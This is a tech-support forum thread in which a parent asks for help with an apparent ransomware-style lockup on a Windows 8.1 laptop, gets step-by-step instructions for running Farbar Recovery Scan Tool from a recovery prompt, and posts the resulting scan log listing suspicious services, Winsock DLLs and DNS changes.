Solved Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

Gitanjali

Posts: 83   +0
Hi,

Sorry about this - not too sure who to turn to as I think that with your help, I could be able to fix this problem. Kids downloaded something and then computer started acting up. Can't even do anything unless I'm in safe mode. Laptop runs Windows 8.1 and it is a few years old as it came from the kids' father. I can email the jpg screenshot. Would appreciate any help/assistance you could offer.

Kind regards,
Not too tech-savy single-mom
 
Welcome aboard

Please, complete all steps listed here: https://www.techspot.com/community/...lware-removal-preliminary-instructions.58138/
Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
Attached logs won't be reviewed.

Please, observe following rules:
  • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
  • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer behavior, good, or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
 
Thanks for the prompt response; however, I can't even start as I can't get anything open as the message takes up the whole screen and the keyboard seems to be unresonsive. I now can't get into safe mode and have tried a few times. Still wondering where to start. Thanks for taking the time to help :)
 
NOTE 1. Use another working computer to download Farbar Recovery Scan Tool. Use USB flash drive to transfer it from good computer to the bad one.
NOTE 2. Install Panda USB Vaccine, or BitDefender’s USB Immunizer on GOOD computer to protect it from any infected USB device.

For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

Plug the flashdrive into the infected PC.

If you are using Windows 10 If you're having problems accessing System Recovery Options create Windows 10 USB or DVD as described here: http://betanews.com/2015/07/29/how-...your-own-installation-usb-flash-drive-or-dvd/ and boot from it.

If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt. To access Advanced Boot Options start and shut down computer TWICE. On third start you should see Advanced Boot Options.

If you are using Vista or Windows 7 enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select US as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account an click Next.

To enter System Recovery Options by using Windows installation disc:
  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select US as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

On the System Recovery Options menu you will get the following options:

  • Startup Repair
  • System Restore
  • Windows Complete PC Restore
  • Windows Memory Diagnostic Tool
  • Command Prompt
  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    Note:
    Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Just a quick question - if I've already backed up my data and have a reboot USB that will put my computer back to factory settings and supposedly wipe the system clean, should I do that instead? I know that you've given me detailed advise (which I truly appreciate) but I wondering won't that be the easiest way to restart from scratch or do you think it best to do not do that at all?
 
Incorrect version will simply throw an error so you can't break anything by trying.
 
Okay scan is running - I'm thinking that once it's done - a dialogue box should pop up? Right? Any ideas as to how long it takes as the tool is now not responding and the command prompt has now gone back to flashing. I'd like to take out the USB but don't want to until it is safe to do.
 
Sorry another couple of quick questions

- what do you with the log after I post it? I'm hoping that you'll continue to give me detailed instructions on how to remove whatever it is on the system.

-Are you on Pacific Time? As I'd like to see if it's at all possible to get this fixed asap.

Again - thanks for your help :)
 
So here it is:


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 18:13:23)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2016-01-10 18:13 - 00000000 ____D C:\FRST
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
